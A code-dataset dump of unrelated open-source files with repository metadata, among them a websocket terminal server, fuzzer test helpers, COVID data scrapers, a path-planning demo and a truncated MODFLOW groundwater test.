wspty.SocketTerminal import SocketTerminal sock = eventlet.green.socket.socket() ip = eventlet.green.socket.gethostbyname(self.hostname) sock.connect((ip, self.port)) return SocketTerminal(sock) if self.kind == 'echo': return EchoTerminal() if self.kind == 'prompt': if not self.allow_unsafe: raise Exception("kind {} is disabled".format(self.kind)) from wspty import PromptTerminal return PromptTerminal.os_terminal() raise NotImplemented('kind: {}'.format(self.kind)) def create(self): return EncodedTerminal(self.create_binary(), self.encoding) class DefaultRootApp: def __init__(self): self._app_handle_wssh = eventlet.websocket.WebSocketWSGI(self.handle_wssh) self.allow_unsafe = False def handle_wssh(self, ws): debug('Creating terminal with remote {remote}'.format( remote=ws.environ.get('REMOTE_ADDR'), )) ws_binding = WebsocketBinding(ws) query = parse_query(ws.environ.get('QUERY_STRING', '')) terminal = None try: kind, terminal = self.create_terminal(query) ws_binding.send('Connected to %s\r\n' % (kind,)) wspty.pipe.pipe(ws_binding, terminal) except BaseException as e: ws_binding.send_error(e) raise finally: if terminal: terminal.close() debug('Closing terminal normally with remote {remote}'.format( remote=ws.environ.get('REMOTE_ADDR'), )) return '' def create_terminal(self, obj): factory = TerminalFactory(obj, self.allow_unsafe) return factory.kind, factory.create() def handler(self, env, *args): route = env["PATH_INFO"] if route == '/wssh': return self._app_handle_wssh(env, *args) else: return app(env, *args) def make_parser(): import argparse parser = argparse.ArgumentParser(description='Websocket Terminal server') parser.add_argument('-l', '--listen', default='', help='Listen on interface (default all)') parser.add_argument('-p', '--port', default=5002, type=int, help='Listen on port') parser.add_argument('--unsafe', action='store_true', help='Allow unauthenticated connections to local machine') return parser def start(interface, port, root_app_handler): conn = (interface, port) listener = eventlet.listen(conn) print('listening on {0}:{1}'.format(*conn)) try: eventlet.wsgi.server(listener, root_app_handler) 
except KeyboardInterrupt: pass def start_default(interface, port, allow_unsafe=False, root_app_cls=DefaultRootApp): root_app = root_app_cls() root_app.allow_unsafe = allow_unsafe start(interface, port, root_app.handler) def main(): args = make_parser().parse_args() start_default(args.listen, args.port, args.unsafe) def get_static_folder(): path_root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../client') path_root = os.path.join(path_root, config.CLIENT_DIR) return os.path.abspath(path_root) app = make_app() if __name__ == '__main__': main()
31.261146
115
0.647514
2,747
0.559698
0
0
194
0.039527
0
0
610
0.124287
bea71c525e82317994bbd637b8bebff771fe81eb
3,406
py
Python
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
null
null
null
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
47
2016-05-26T22:09:56.000Z
2018-08-08T20:33:39.000Z
tests/unit/test_roger_promote.py
seomoz/roger-mesos-tools
88b4cb3550a4b49d0187cfb5e6a22246ff6b9765
[ "Apache-2.0" ]
3
2017-09-20T22:39:03.000Z
2017-11-07T22:29:29.000Z
# -*- encoding: utf-8 -*- """ Unit test for roger_promote.py """ import tests.helper import unittest import os import os.path import pytest import requests from mockito import mock, Mock, when from cli.roger_promote import RogerPromote from cli.appconfig import AppConfig from cli.settings import Settings from cli.framework import Framework from cli.frameworkUtils import FrameworkUtils from cli.marathon import Marathon from cli.chronos import Chronos class TestRogerPromote(unittest.TestCase): def setUp(self): self.marathon = mock(Marathon) self.settings = mock(Settings) self.app_config = mock(AppConfig) self.framework = self.marathon self.framework_utils = mock(FrameworkUtils) self.config_file = "test.yml" self.roger_env = {} os.environ['ROGER_CONFIG_DIR'] = '/vagrant/config' @property def config_dir(self): return os.environ['ROGER_CONFIG_DIR'] def test_config_dir(self): rp = RogerPromote() assert rp.config_dir == '/vagrant/config' def test_roger_env(self): fake_config = tests.helper.fake_config() settings = mock(Settings) when(self.app_config).getRogerEnv( self.config_dir ).thenReturn(fake_config) rp = RogerPromote(app_config=self.app_config) assert rp.roger_env == fake_config def test_set_framework(self): app_data = {'test_app': {'name': 'test_app'}} when(self.app_config).getAppData( self.config_dir, self.config_file, 'test_app' ).thenReturn(app_data) rp = RogerPromote(app_config=self.app_config) rp._set_framework(self.config_file, 'test_app') assert rp._framework.getName() == 'Marathon' def test_image_name(self): os.environ['ROGER_USER'] = "first.last" os.environ['ROGER_USER_PASS_DEV'] = "password" os.environ['ROGER_USER_PASS_STAGE'] = "password" os.environ['ROGER_USER_PASS_PROD'] = "password" framework = mock(Marathon) when(framework).getName().thenReturn("Marathon") when(framework).get_app_id( "test_path/test_app.json", "Marathon" ).thenReturn("app_id") when(framework).get_image_name( 'first.last', "password", "dev", "app_id", self.config_dir, self.config_file ).thenReturn("test_image") rp = RogerPromote(framework=framework) assert rp._image_name( 'dev', self.config_file, "test_path/test_app.json") == 'test_image' def test_config_resolver(self): framework = mock(Framework) settings = mock(Settings) app_config = mock(AppConfig) config_dir = '/vagrant/config' fake_team_config = tests.helper.fake_team_config() when(settings).getConfigDir().thenReturn(config_dir) when(app_config).getConfig( config_dir, 'roger.json' ).thenReturn(fake_team_config) rp = RogerPromote(settings=settings, app_config=app_config) val = rp._config_resolver('template_path', 'test_app', 'roger.json') assert val == 'framework_template_path' def test_roger_push_script(self): path = RogerPromote()._roger_push_script() assert 'roger-mesos-tools/cli/roger_push.py' in path
28.383333
76
0.645919
2,942
0.86377
0
0
81
0.023782
0
0
590
0.173224
bea77828d8025fc0087d40bc8239898137482a39
7,097
py
Python
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
6
2020-03-24T22:03:34.000Z
2020-03-25T21:08:02.000Z
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
null
null
null
data/collectors.py
papb/COVID-19
2dc8e683f55c494ca894727aca56f90e53b161f3
[ "MIT" ]
1
2020-03-27T20:25:03.000Z
2020-03-27T20:25:03.000Z
import json import pandas as pd import requests def load_dump_covid_19_data(): COVID_19_BY_CITY_URL='https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-cities-time.csv' by_city=(pd.read_csv(COVID_19_BY_CITY_URL) .query('country == "Brazil"') .drop(columns=['country']) .pipe(lambda df: df[df.state!='TOTAL']) .assign(city=lambda df: df.city.apply(lambda x: x.split('/')[0])) .rename(columns={'totalCases': 'cases', 'newCases': 'new_cases', 'state': 'uf'}) .sort_values(by=['city', 'date']) ) by_uf = (by_city .groupby(['date', 'uf']) ['new_cases', 'cases'] .sum() .reset_index()) dfs = [by_uf, by_city] filenames = ['by_uf', 'by_city'] for df, filename in zip(dfs, filenames): output_path = f'data/csv/covid_19/{filename}/{filename}.csv' df.to_csv(output_path, index=False) print(f'{filename} data exported to {output_path}') def load_dump_uf_pop(): IBGE_POPULATION_EXCEL_URL = 'ftp://ftp.ibge.gov.br/Estimativas_de_Populacao/Estimativas_2019/estimativa_dou_2019.xls' def _load_uf_codes(): print('Scraping UF codes') return ( pd.read_html( 'https://www.oobj.com.br/bc/article/' 'quais-os-c%C3%B3digos-de-cada-uf-no-brasil-465.html' ) [0] .replace('\s\(\*\)', '', regex=True) .rename(columns={'UF': 'uf'}) [['Unidade da Federação', 'uf']] ) def _load_uf_capitals(): print('Scraping UF capital names') return ( pd.read_html( 'https://www.estadosecapitaisdobrasil.com/' ) [0] .rename(columns={'Sigla': 'uf', 'Capital': 'city'}) [['uf', 'city']] ) # TODO: download excel file only once def _download_ibge_excel_file(url): pass def _load_city_pop(): print('Scraping city population') return ( pd.read_excel(IBGE_POPULATION_EXCEL_URL, sheet_name='Municípios', header=1) .rename(columns={ 'COD. UF': 'UF_code', 'COD. MUNIC': 'city_code', 'NOME DO MUNICÍPIO': 'city', 'POPULAÇÃO ESTIMADA': 'estimated_population' }) .dropna(how='any') .assign(estimated_population=lambda df: df.estimated_population .replace('\.', '', regex=True) .replace('\-', ' ', regex=True) .replace('\(\d+\)', '', regex=True) .astype('int') ) .assign( UF_code=lambda df: df.UF_code.astype(int)) .assign(city_code=lambda df: df.city_code.astype(int)) .rename(columns={'UF': 'uf'}) [['uf', 'city', 'estimated_population']] ) def _load_uf_pop(): print('Scraping UF population') uf_codes = _load_uf_codes() return ( pd.read_excel(IBGE_POPULATION_EXCEL_URL, header=1) .drop(columns=['Unnamed: 1']) .rename(columns={'POPULAÇÃO ESTIMADA': 'estimated_population'}) .dropna(how='any') .assign(estimated_population=lambda df: df.estimated_population .replace('\.', '', regex=True) .replace('\-', ' ', regex=True) .replace('\(\d\)', '', regex=True) .astype('int') ) .pipe(lambda df: pd.merge(df, uf_codes, left_on='BRASIL E UNIDADES DA FEDERAÇÃO', right_on='Unidade da Federação', how='inner')) [['uf', 'estimated_population']] ) uf_pop, city_pop, uf_capitals = (_load_uf_pop(), _load_city_pop(), _load_uf_capitals()) print('Combining uf and city data') uf_pop = ( uf_pop # Add capital city name .merge( uf_capitals, how='left', on='uf' ) # Add capital population .merge( city_pop, how='left', on=['uf', 'city'] ) .rename( columns={ 'estimated_population_x': 'estimated_population', 'estimated_population_y': 'capital_estimated_population' } ) ) dfs = [uf_pop, city_pop] filenames = ['by_uf', 'by_city'] for df, filename in zip(dfs, filenames): output_path = f'data/csv/population/{filename}/{filename}.csv' df.to_csv(output_path, index=False) print(f'{filename} data exported to {output_path}') def load_jh_df(csv): ''' Loads a CSV file from JH repository and make some transforms 
''' jh_data_path = ( 'https://raw.githubusercontent.com/' 'CSSEGISandData/COVID-19/master/' 'csse_covid_19_data/csse_covid_19_time_series/' ) return ( pd.read_csv( jh_data_path + csv[1] ) .drop(['Lat', 'Long'], axis=1) .groupby('Country/Region') .sum() .reset_index() .rename( columns={'Country/Region':'country'} ) .melt( id_vars=['country'], var_name='date', value_name=csv[0] ) .assign( date=lambda x: pd.to_datetime( x['date'], format='%m/%d/%y' ) ) ) def load_jh_data(): ''' Loads the latest COVID-19 global data from Johns Hopkins University repository ''' cases_csv = ('cases', 'time_series_19-covid-Confirmed.csv') deaths_csv = ('deaths', 'time_series_19-covid-Deaths.csv') recovered_csv = ('recoveries', 'time_series_19-covid-Recovered.csv') return ( pd.merge( pd.merge( load_jh_df(cases_csv), load_jh_df(deaths_csv) ), load_jh_df(recovered_csv) ) .reindex( columns = ['date', 'cases', 'deaths', 'recoveries', 'country'] ) ) if __name__ == '__main__': try: load_dump_covid_19_data() except Exception as e: print(f'Error when collecting COVID-19 cases data: {repr(e)}') try: load_dump_uf_pop() except Exception as e: print(f'Error when collecting population data: {repr(e)}')
32.856481
121
0.479217
0
0
0
0
0
0
0
0
2,113
0.297229
bea7f47e5f837c85a165df266359f1d2def3dfcd
5,976
py
Python
testsuite/testsuite_helpers.py
freingruber/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
91
2022-01-24T07:32:34.000Z
2022-03-31T23:37:15.000Z
testsuite/testsuite_helpers.py
zeusguy/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
null
null
null
testsuite/testsuite_helpers.py
zeusguy/JavaScript-Raider
d1c1fff2fcfc60f210b93dbe063216fa1a83c1d0
[ "Apache-2.0" ]
11
2022-01-24T14:21:12.000Z
2022-03-31T23:37:23.000Z
import config as cfg import utils import native_code.executor as executor number_performed_tests = 0 expectations_correct = 0 expectations_wrong = 0 def reset_stats(): global number_performed_tests, expectations_correct, expectations_wrong number_performed_tests = 0 expectations_correct = 0 expectations_wrong = 0 def get_number_performed_tests(): global number_performed_tests return number_performed_tests def get_expectations_correct(): global expectations_correct return expectations_correct def get_expectations_wrong(): global expectations_wrong return expectations_wrong def assert_success(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") raise Exception() def assert_crash(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.CRASH: utils.msg("[-] ERROR: Returned status was not CRASH") raise Exception() def assert_exception(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.EXCEPTION_THROWN and result.status != executor.Execution_Status.EXCEPTION_CRASH: utils.msg("[-] ERROR: Returned status was not EXCEPTION") raise Exception() def assert_timeout(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.TIMEOUT: utils.msg("[-] ERROR: Returned status was not TIMEOUT") raise Exception() def assert_output_equals(result, expected_output): global number_performed_tests number_performed_tests += 1 if result.output.strip() != expected_output.strip(): utils.msg("[-] ERROR: Returned output (%s) was not correct (%s)" % (result.output.strip(), expected_output)) raise Exception() def execute_program(code_to_execute): cfg.exec_engine.restart_engine() result = cfg.exec_engine.execute_safe(code_to_execute) return result def restart_exec_engine(): cfg.exec_engine.restart_engine() def execute_program_from_restarted_engine(code_to_execute): restart_exec_engine() return execute_program(code_to_execute) def assert_int_value_equals(value_real, value_expected, error_msg): global number_performed_tests number_performed_tests += 1 if value_real == value_expected: return # Test PASSED utils.msg("[-] ERROR: %s (expected: %d ,real: %d)" % (error_msg, value_expected, value_real)) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_string_value_equals(string_real, string_expected, error_msg): global number_performed_tests number_performed_tests += 1 if string_real == string_expected: return # Test PASSED print("[-] ERROR: %s (expected: %s ,real: %s)" % (error_msg, string_expected, string_real)) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_no_new_coverage(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges == 0: return # test PASSED print("[-] ERROR: Found new coverage (%d) but expected that there is no new coverage!" 
% result.num_new_edges) # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed def assert_new_coverage(result): global number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges != 0: return # test PASSED print("[-] ERROR: Found no new coverage but there should be one!") # In this case I throw an exception to stop execution because speed optimized functions must always be correct raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed # The expect functions don't throw an exception like the assert_* functions # Instead, they just count how often the expected result was true def expect_no_new_coverage(result): global expectations_correct, expectations_wrong, number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges == 0: expectations_correct += 1 else: expectations_wrong += 1 # The expect functions don't throw an exception like the assert_* functions # Instead, they just count how often the expected result was true def expect_new_coverage(result): global expectations_correct, expectations_wrong, number_performed_tests number_performed_tests += 1 if result.status != executor.Execution_Status.SUCCESS: utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS raise Exception() if result.num_new_edges != 0: expectations_correct += 1 else: expectations_wrong += 1
34.947368
130
0.737784
0
0
0
0
0
0
0
0
1,933
0.323461
bea8a3765c24aad74f039b0b081e005d38797cfe
99
py
Python
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
null
null
null
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
1
2017-07-11T22:03:27.000Z
2017-07-11T22:03:27.000Z
examples/my_configs/two.py
davidhyman/override
e34bd3c8676233439de5c002367b3bff5c1b88d6
[ "MIT" ]
null
null
null
from .one import *

fruit = 'banana'
colour = 'orange'

sam['eggs'] = 'plenty'
sam.pop('ham')
14.142857
23
0.585859
0
0
0
0
0
0
0
0
35
0.353535
bea8aa6132f2274610cc25a57ec0c74c8765342d
371
py
Python
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022
a63691317a72fb9b29ae537bc3d7766661458c22
[ "MIT" ]
null
null
null
from django.urls import path, include

from rest_framework_jwt.views import obtain_jwt_token
from rest_framework.routers import DefaultRouter

from .views import NoteViewSet

app_name = 'api'

router = DefaultRouter(trailing_slash=False)
router.register('notes', NoteViewSet)

urlpatterns = [
    path('jwt-auth/', obtain_jwt_token),
    path('', include(router.urls)),
]
23.1875
53
0.77628
0
0
0
0
0
0
0
0
25
0.067385
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7
2,387
py
Python
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
null
null
null
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
null
null
null
PathPlanning/run.py
CandleStein/VAlg
43aecdd351954d316f132793cf069b70bf2e5cc2
[ "MIT" ]
1
2020-09-25T18:31:34.000Z
2020-09-25T18:31:34.000Z
from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt

parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
    "-n",
    "--n_heuristic",
    default=2,
    help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)

drawing = False  # true if mouse is pressed
mode = "obs"  # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50


# mouse callback function
def draw(event, x, y, flags, param):
    global mode, sx, sy, dx, dy, drawing
    if event == cv.EVENT_LBUTTONDOWN:
        drawing = True
    elif event == cv.EVENT_MOUSEMOVE:
        if drawing == True:
            if mode == "obs":
                cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
    elif event == cv.EVENT_LBUTTONUP:
        drawing = False
        if mode == "obs":
            cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
        elif mode == "src":
            cv.circle(img, (x, y), 5, (255, 0, 0), -1)
            sx, sy = x, y
        elif mode == "dst":
            cv.circle(img, (x, y), 5, (0, 255, 0), -1)
            dx, dy = x, y


img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255

cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
    cv.imshow("Draw the Occupancy Map", inv_im - img)
    if cv.waitKey(20) & 0xFF == 27:
        break
cv.destroyAllWindows()

mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
    cv.imshow("Set the Starting Point", inv_im - img)
    if cv.waitKey(20) & 0xFF == 27:
        break
# cv.waitKey(20)
cv.destroyAllWindows()

mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
    cv.imshow(end, inv_im - img)
    if cv.waitKey(20) & 0xFF == 27:
        break
cv.destroyAllWindows()

img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)

start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512

path(start, end, N_H)
26.820225
86
0.607038
0
0
0
0
0
0
0
0
447
0.187264
beaf6a34e9709a7f3a490a80d9b84b4126151d38
186
py
Python
Codeforces/problems/0136/A/136A.py
object-oriented-human/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
2
2021-07-27T10:46:47.000Z
2021-07-27T10:47:57.000Z
Codeforces/problems/0136/A/136A.py
foooop/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
null
null
null
Codeforces/problems/0136/A/136A.py
foooop/competitive
9e761020e887d8980a39a64eeaeaa39af0ecd777
[ "MIT" ]
null
null
null
n = int(input())
line = list(map(int, input().split()))
l = {}
res = ""

for i, j in enumerate(line):
    l[j] = i+1

for k in range(n):
    res += str(l[k+1]) + " "

print(res.rstrip())
15.5
38
0.516129
0
0
0
0
0
0
0
0
5
0.026882
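For reference, a standalone rerun of the inverse-permutation idea from the 136A.py snippet in this row (illustrative, not part of the archived file):

# The dict maps each value to its 1-based position, so printing the positions
# of 1..n yields the inverse permutation.
line = [2, 3, 4, 1]
inverse = {j: i + 1 for i, j in enumerate(line)}
print(" ".join(str(inverse[k + 1]) for k in range(len(line))))  # prints: 4 1 2 3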
beb013240bc0b9610971205973878d44dedde94f
323
py
Python
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
generatey.py
YiLisa/DSCI560-hw2
9cf4a40a6e4755ea1b0b68248e553fb4b6b7fdf4
[ "Apache-2.0" ]
null
null
null
import pandas as pd


def main():
    input = pd.read_csv('random_x.csv', header=None)
    x = input[0].tolist()
    y = []
    for n in x:
        y.append(3*int(n)+6)
    df = pd.DataFrame(y)
    df.to_csv('output_y.csv', index=False, header=False)


if __name__ == '__main__':
    main()
    print('generating y = 3x+6...')
21.533333
56
0.582043
0
0
0
0
0
0
0
0
62
0.19195
beb0a9e7bb5a51ebb9a999b6f45ac4bb5d9df106
1,002
py
Python
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
setup.py
burn874/mtg
cef47f6ec0ca110bdcb885ec09d6f5aca517c3b2
[ "Apache-2.0" ]
null
null
null
import re
from pkg_resources import parse_requirements
import pathlib
from setuptools import find_packages, setup

README_FILE = 'README.md'
REQUIREMENTS_FILE = 'requirements.txt'
VERSION_FILE = 'mtg/_version.py'
VERSION_REGEXP = r'^__version__ = \'(\d+\.\d+\.\d+)\''

r = re.search(VERSION_REGEXP, open(VERSION_FILE).read(), re.M)
if r is None:
    raise RuntimeError(f'Unable to find version string in {VERSION_FILE}.')

version = r.group(1)
long_description = open(README_FILE, encoding='utf-8').read()
install_requires = [str(r) for r in parse_requirements(open(REQUIREMENTS_FILE, 'rt'))]

setup(
    name='mtg',
    version=version,
    description='mtg is a collection of data science and ml projects for Magic:the Gathering',
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='Ryan Saxe',
    author_email='[email protected]',
    url='https://github.com/RyanSaxe/mtg',
    packages=find_packages(),
    install_requires=install_requires,
)
31.3125
94
0.739521
0
0
0
0
0
0
0
0
307
0.306387
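The VERSION_REGEXP in the setup script above expects mtg/_version.py to contain a single-quoted X.Y.Z version string; a hypothetical example of a matching line (the version number itself is illustrative):

# Hypothetical contents of mtg/_version.py in the format VERSION_REGEXP matches.
__version__ = '1.2.3'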
beb1a4b08f2fc3818a575158bc7a69b7e5f252c7
1,399
py
Python
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
null
null
null
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
1
2021-12-19T07:43:30.000Z
2021-12-19T07:43:30.000Z
avilla/core/resource/interface.py
RF-Tar-Railt/Avilla
0b6eff0e253d4c04a5c82f4f252b6a11b7d81e04
[ "MIT" ]
null
null
null
from __future__ import annotations

from dataclasses import dataclass

from avilla.core.platform import Base
from avilla.core.resource import Resource, ResourceProvider


@dataclass
class ResourceMatchPrefix:
    resource_type: type[Resource]
    keypath: str | None = None
    platform: Base | None = None


class ResourceInterface:
    providers: dict[ResourceMatchPrefix, ResourceProvider]

    def __init__(self):
        self.providers = {}

    def register(
        self,
        resource_type: type[Resource],
        provider: ResourceProvider,
        *,
        mainline_keypath: str | None = None,
        platform: Base | None = None,
    ):
        self.providers[ResourceMatchPrefix(resource_type, mainline_keypath, platform)] = provider

    def get_provider(
        self,
        resource: Resource | type[Resource],
        *,
        mainline_keypath: str | None = None,
        platform: Base | None = None,
    ) -> ResourceProvider | None:
        resource_type = resource if isinstance(resource, type) else type(resource)
        for prefix in self.providers:
            if all((
                prefix.resource_type is resource_type,
                prefix.keypath == mainline_keypath if prefix.keypath is not None else True,
                prefix.platform == platform if prefix.platform is not None else True
            )):
                return self.providers[prefix]
29.765957
97
0.647605
1,213
0.867048
0
0
135
0.096497
0
0
0
0
beb313eb5f64fc657c1686ad77dc2225b87a4889
570
py
Python
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
viewer_examples/plugins/median_filter.py
atemysemicolon/scikit-image
a48cf5822f9539c6602b9327c18253aed14fa692
[ "BSD-3-Clause" ]
null
null
null
from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin


def median_filter(image, radius):
    return median(image, selem=disk(radius))


image = data.coins()
viewer = ImageViewer(image)

plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()

viewer += plugin
viewer.show()
25.909091
71
0.784211
0
0
0
0
0
0
0
0
13
0.022807
beb317bf51c8d955452bb7ade64a00caeb647030
8,722
py
Python
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
3
2019-07-10T21:16:57.000Z
2021-10-08T00:56:20.000Z
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
null
null
null
autotest/test_gwf_buy_lak01.py
scharlton2/modflow6
83ac72ee3b6f580aaffef6352cf15c1697d3ce66
[ "CC0-1.0" ]
3
2019-11-28T16:26:50.000Z
2020-02-05T11:08:37.000Z
# Test the buoyancy package and the variable density flows between the lake # and the gwf model. This model has 4 layers and a lake incised within it. # The model is transient and has heads in the aquifer higher than the initial # stage in the lake. As the model runs, the lake and aquifer equalize and # should end up at the same level. The test ensures that the initial and # final water volumes in the entire system are the same. There are three # different cases: # 1. No buoyancy package # 2. Buoyancy package with lake and aquifer density = 1000. # 3. Buoyancy package with lake and aquifer density = 1024.5 import os import pytest import sys import numpy as np try: import flopy except: msg = "Error. FloPy package is not available.\n" msg += "Try installing using the following command:\n" msg += " pip install flopy" raise Exception(msg) from framework import testing_framework from simulation import Simulation ex = ["buy_lak_01a"] # , 'buy_lak_01b', 'buy_lak_01c'] buy_on_list = [False] # , True, True] concbuylist = [0.0] # , 0., 35.] exdirs = [] for s in ex: exdirs.append(os.path.join("temp", s)) def build_model(idx, dir): lx = 7.0 lz = 4.0 nlay = 4 nrow = 1 ncol = 7 nper = 1 delc = 1.0 delr = lx / ncol delz = lz / nlay top = 4.0 botm = [3.0, 2.0, 1.0, 0.0] perlen = [10.0] nstp = [50] tsmult = [1.0] Kh = 1.0 Kv = 1.0 tdis_rc = [] for i in range(nper): tdis_rc.append((perlen[i], nstp[i], tsmult[i])) nouter, ninner = 700, 300 hclose, rclose, relax = 1e-8, 1e-6, 0.97 name = ex[idx] # build MODFLOW 6 files ws = dir sim = flopy.mf6.MFSimulation( sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws ) # create tdis package tdis = flopy.mf6.ModflowTdis( sim, time_units="DAYS", nper=nper, perioddata=tdis_rc ) # create gwf model gwfname = "gwf_" + name gwf = flopy.mf6.ModflowGwf(sim, modelname=gwfname, newtonoptions="NEWTON") imsgwf = flopy.mf6.ModflowIms( sim, print_option="ALL", outer_dvclose=hclose, outer_maximum=nouter, under_relaxation="NONE", inner_maximum=ninner, inner_dvclose=hclose, rcloserecord=rclose, linear_acceleration="BICGSTAB", scaling_method="NONE", reordering_method="NONE", relaxation_factor=relax, filename="{}.ims".format(gwfname), ) idomain = np.full((nlay, nrow, ncol), 1) idomain[0, 0, 1:6] = 0 idomain[1, 0, 2:5] = 0 idomain[2, 0, 3:4] = 0 dis = flopy.mf6.ModflowGwfdis( gwf, nlay=nlay, nrow=nrow, ncol=ncol, delr=delr, delc=delc, top=top, botm=botm, idomain=idomain, ) # initial conditions strt = np.zeros((nlay, nrow, ncol), dtype=float) strt[0, 0, :] = 3.5 strt[1, 0, :] = 3.0 strt[1, 0, 1:6] = 2.5 strt[2, 0, :] = 2.0 strt[3, 0, :] = 1.0 ic = flopy.mf6.ModflowGwfic(gwf, strt=strt) # node property flow npf = flopy.mf6.ModflowGwfnpf( gwf, xt3doptions=False, save_flows=True, save_specific_discharge=True, icelltype=1, k=Kh, k33=Kv, ) sto = flopy.mf6.ModflowGwfsto(gwf, sy=0.3, ss=0.0, iconvert=1) c = concbuylist[idx] lake_dense = 1000.0 